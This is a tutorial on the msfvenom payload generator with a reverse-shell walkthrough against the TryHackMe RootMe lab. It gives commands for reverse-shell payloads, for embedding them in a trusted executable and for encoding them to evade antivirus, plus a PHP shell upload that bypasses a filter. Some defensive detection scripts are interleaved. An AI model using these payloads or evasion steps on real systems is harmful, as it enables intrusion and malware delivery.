A Deep Dive into MSFVenom

What is msfvenom?

The Metasploit framework includes msfvenom, a command-line payload generator. It replaced the older pair msfpayload and msfencode, combining both into one tool. With msfvenom we can generate payloads for almost any platform, including Linux, Windows, Android, iOS, BSD, Cisco and others.

Not only that, but msfvenom can emit payloads in many programming languages, including Python, C, Java, PHP, Ruby and more. Its two distinguishing features are the ability to build payloads for virtually any platform and the use of encoders to make payloads harder for defensive software to recognise.

Command breakdown

The first command to get familiar with is the help menu (-h). Every tool describes its own usage there. Take a look:

Command: msfvenom -h

This lists every command-line option msfvenom accepts, each with a brief description.

We'll walk through a few of them now.

-l module-type

This flag lists every available module of a given type: formats, platforms, archs, encrypt, payloads and so on. If you don't know exactly which payload you want but you do know something about the target, for instance that the server runs PHP, you can list all payloads and grep for the ones mentioning PHP. That is how you narrow down the payload you need.

Command: msfvenom -l payloads

Command: msfvenom -l payloads | grep PHP

In my opinion you should try each alternative and see what it has to offer.

Passing all as the argument lists everything at once: payloads, encoders, nops, platforms, archs, encrypts and formats.

Command: msfvenom -l all

Note that listing every module takes a while, so be patient.

-p payload

This flag selects a particular payload. Once you have decided which payload to use against the target system, pass it here so that the generated shellcode or malicious file is built from it.

Command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=31337 -f c

Ignore the other flags for now; we'll cover them shortly.

--list-options

After choosing a payload, you may want to review its details to confirm it suits your target, and to find out which arguments (options) the payload requires. Use this flag only after selecting the payload. In the screenshot the required options are boxed.

Command: msfvenom -p windows/meterpreter/reverse_tcp --list-options

-f format-type

This flag selects the output format of the payload. The format can be a programming language, so if one language is not available on the victim's machine, we can pick another. Besides programming languages we can also choose binary formats such as exe.

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f python

If you want an executable instead, change "python" to "exe".

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe

Note that binary output cannot be copied and pasted from the terminal; for binary formats you must write it to a file with the -o option, described below.

-v variable-name

As marked in the screenshot, this flag sets the name of the variable that holds the shellcode in the generated code. That is handy when we only need the shellcode and embed it in our own exploit code, for instance a buffer overflow.

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f python -v shellcode

-o output-file

This flag writes the whole payload to a file of your choosing. It is most useful when a binary format such as exe is selected, because binary output cannot be copied and pasted.

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe

-b bad-characters

When building shellcode we regularly run into bad characters, such as "\x00", "\xa0" and other byte values that prevent the shellcode from executing (a null byte terminating a string copy, for example). This flag tells msfvenom to produce shellcode that avoids the listed bytes. Most buffer-overflow-style attacks benefit from it.

The listed bad characters are removed, so searching the generated shellcode for them turns up nothing.

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f python -v shellcode -b "\x00\x1c"

-n number

Because of the bad characters, msfvenom has to run the payload through an encoder, and the shellcode then decodes itself on the target machine when it executes. During that decoding the shellcode grows in memory, which can corrupt nearby data and break the exploit. A NOP sled (no-operation instructions, 0x90) in front of the shellcode helps avoid this.

Note: you can add as many NOPs as the available space allows; 90, as I used here, is not a magic number.

Before, without NOPs:

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f python -v shellcode -b "\x00\x1c"

After, with 90 NOPs:

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f python -v shellcode -b "\x00\x1c" -n 90

Adding the NOPs also increases the payload size. Subtracting the two sizes (after minus before, 593 - 503) gives 90, exactly the 90 bytes of NOPs we asked msfvenom for.
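To check the two claims made above (no bad bytes remain, and the size grows by the NOP count), here is a small Python helper that reads the text msfvenom prints with -f python -v shellcode, rebuilds the bytes without exec(), and reports size, NOP sled length and any surviving bad characters. This is an added example, not code from the article; the sample output below is constructed and is not a real payload.

```python
import re

# Constructed stand-in for "msfvenom -f python -v shellcode" output (not a real
# payload): a 4-byte NOP sled followed by ten arbitrary bytes, three of them null.
SAMPLE_OUTPUT = r'''shellcode =  b""
shellcode += b"\x90\x90\x90\x90"
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"
'''

# Matches the b"\xNN\xNN..." literal on each line msfvenom emits.
HEX_RE = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_msfvenom_python(text: str) -> bytes:
    """Rebuild the raw shellcode bytes from msfvenom's -f python text."""
    out = bytearray()
    for m in HEX_RE.finditer(text):
        out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def find_bad_chars(code: bytes, bad: bytes) -> dict:
    """Map each bad byte that still appears to the offsets where it occurs."""
    return {b: [i for i, c in enumerate(code) if c == b] for b in bad if b in code}


def nop_sled_length(code: bytes, nop: int = 0x90) -> int:
    """Count leading NOP (0x90) bytes, i.e. the sled msfvenom -n prepends."""
    n = 0
    while n < len(code) and code[n] == nop:
        n += 1
    return n


def summarize(text: str, bad: bytes) -> dict:
    """Size, sled length and bad-character report for one msfvenom output."""
    code = parse_msfvenom_python(text)
    return {"size": len(code), "nops": nop_sled_length(code),
            "bad": find_bad_chars(code, bad)}


if __name__ == "__main__":
    print(summarize(SAMPLE_OUTPUT, b"\x00\x1c"))   # the nulls are reported
    print(summarize(SAMPLE_OUTPUT, b"\x1c\xa0"))   # clean for this bad-char set
```

Run it on the "before" and "after" outputs and the difference in "size" should equal the -n value, as the 593 - 503 = 90 observation above shows.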

-x template-file

This flag uses a legitimate executable that the victim is likely to trust as a template for our malicious executable. When the victim runs it, it looks like the ordinary program, but our shellcode runs as well.

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -x nc64.exe -o malicious-nc.exe

This also helps get past some antivirus products. To see why, look at the example below.

Using a cover file

For comparison, the same payload was generated without a cover file: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o uncover-nc.exe

The difference is clear: only 33 antivirus programmes detected the file built with the cover file, while 52 detected the one built without it. Substituting a different, ordinary exe for nc.exe would likely have slipped past even more of them.

-e encoder-name

An encoder serves several purposes, from removing bad characters to obscuring the payload from antivirus software. You saw above how the -x template exe let the file slip past a number of antivirus programmes; an encoder can take that further. Look at this.

Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -e x86/shikata_ga_nai -x nc64.exe -o malicious-encode-nc.exe

Note that x86/shikata_ga_nai is a 32-bit encoder; for an x64 payload the matching choices are the x64 encoders (list them with msfvenom -l encoders).

Again the difference is clear: only 21 antivirus programmes detected it. You may be surprised that well-known products such as Malwarebytes, Dr.Web and McAfee missed it. With a few additional techniques detection can be avoided entirely, but that is a topic for another day.
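From the defender's side, the detection counts above come largely from signatures on the decoder that shikata_ga_nai prepends to the payload. This added example (not code from the article) shows the kind of heuristic a scanner applies: the decoder finds its own address with fnstenv [esp-0xc] (bytes d9 74 24 f4) followed by a pop, and ends its decode loop with a loop instruction (0xE2). The sample bytes are constructed to have that shape and are not a real payload; on real binaries the heuristic will produce both false positives and misses.

```python
FNSTENV = b"\xd9\x74\x24\xf4"   # fnstenv [esp-0xc]: the GetPC trick shikata_ga_nai relies on

# Constructed bytes shaped like a shikata_ga_nai decoder stub (not a real payload):
# fldz; fnstenv [esp-0xc]; pop ebx; mov eax, key; xor [ebx+0x1b], eax; add ebx, 4; loop
SAMPLE_STUB = bytes.fromhex("d9ee d97424f4 5b b811223344 31431b 83c304 e2f5".replace(" ", ""))
# Byte run with no such pattern, used as a negative control.
CLEAN_BYTES = bytes(range(256))


def find_getpc_decoder_stubs(data: bytes, window: int = 32) -> list:
    """Return offsets of candidate decoder stubs: fnstenv [esp-0xc], then a pop r32
    (0x58..0x5f) within 6 bytes, then a loop opcode (0xe2) within `window` bytes."""
    hits = []
    start = 0
    while True:
        i = data.find(FNSTENV, start)
        if i < 0:
            break
        after = data[i + 4:i + 4 + window]
        pop_at = next((k for k, b in enumerate(after[:6]) if 0x58 <= b <= 0x5F), None)
        if pop_at is not None and 0xE2 in after[pop_at:]:
            hits.append(i)
        start = i + 1
    return hits


def looks_encoded(data: bytes) -> bool:
    """True when at least one candidate stub is present."""
    return bool(find_getpc_decoder_stubs(data))


def scan_file(path: str) -> list:
    """Scan a file on disk (e.g. the exe produced with -x) for candidate stubs."""
    with open(path, "rb") as fh:
        return find_getpc_decoder_stubs(fh.read())


if __name__ == "__main__":
    print(find_getpc_decoder_stubs(SAMPLE_STUB))   # [2]
    print(looks_encoded(CLEAN_BYTES))               # False
```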

LHOST (local host)

LHOST is not an msfvenom flag; whether you need it depends entirely on the payload you are using, which you can verify with --list-options as described above. In short, anything that connects back to you needs an LHOST. If you are connected over a VPN, use the VPN interface's IP (tun0 in the examples above) rather than your LAN address.

LPORT (listening port)

LPORT works like LHOST: whether it is needed depends on the payload you choose. It is the port your listener waits on for the victim machine to connect to.

msfvenom in action

That should be a solid grounding in how msfvenom is used. Now let's try the techniques you have just learned against a real machine.

PHP reverse shell

For this demonstration we'll create a PHP reverse shell with msfvenom and catch the connection with Metasploit and with netcat (nc).

I'm using the TryHackMe room RootMe for this example. You can try it too: you only need to register an account on their site to access the room, which is free.

Info: port 80 on the machine is open, serving a basic website on Apache2. It has two directories: panel, which includes an upload feature, and uploads, where the uploaded files are saved. The upload function rejects .php files but accepts .phtml files.

Command: msfvenom -p php/reverse_php LHOST=tun0 LPORT=1337 -o php-rev.phtml

Here is the shell; upload it.

Our shell now appears in the uploads directory.

Now set up a listener in Metasploit, then open the shell in the uploads directory. A connection comes in.

Commands executed:

  • msfconsole -q
  • use exploit/multi/handler
  • set lhost tun0
  • set lport 1337
  • set payload php/reverse_php
  • run

We now have a reverse shell. Experiment with it further and try upgrading it to a meterpreter shell.

You can achieve the same thing with netcat (nc): just start a listener on the chosen port.

Command: nc -lnvp 1337
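On the defending side, the RootMe sequence above leaves a recognisable trail in the web server's access log: a POST to the upload form, then a GET of a file with a server-executable extension under /uploads/. This added Python example (not code from the article or the room) parses constructed Apache combined-log lines and flags that pattern; the IPs, timestamps and paths are made up, and the extension list assumes Apache's usual PHP handler, which covers .phtml as well as .php.

```python
import re

# Constructed Apache combined-log lines modelling the walkthrough (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /panel/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "POST /panel/ HTTP/1.1" 200 214 "http://target/panel/" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /uploads/php-rev.phtml HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /uploads/holiday.jpg HTTP/1.1" 200 80213 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Extensions the default PHP handler executes; an upload filter that blocks only
# ".php" (as in the room) still lets these through.
EXEC_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps")


def parse_line(line: str):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_execution(log_text: str, upload_dir: str = "/uploads/",
                          upload_form: str = "/panel/") -> list:
    """Flag requests for server-executable files under the upload directory and
    note whether the same client POSTed to the upload form earlier in the log."""
    posted = set()
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(upload_form):
            posted.add(rec["ip"])
        path = rec["path"].split("?", 1)[0].lower()
        if path.startswith(upload_dir) and path.endswith(EXEC_EXT):
            hits.append({"ip": rec["ip"], "path": rec["path"], "time": rec["ts"],
                         "status": rec["status"], "uploaded_earlier": rec["ip"] in posted})
    return hits


if __name__ == "__main__":
    for hit in find_upload_execution(SAMPLE_LOG):
        print(hit)
```

The lasting fix is to stop the web server executing anything under the uploads directory (for mod_php, php_admin_flag engine off in that directory's configuration) rather than relying on an extension blacklist.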

Final remarks

msfvenom has many more uses than covered here. You now understand what it is for; work through the rest with Google and the documentation.

Hope you liked it. Share your thoughts on this article with us. Until the next article, take care, and keep hacking.
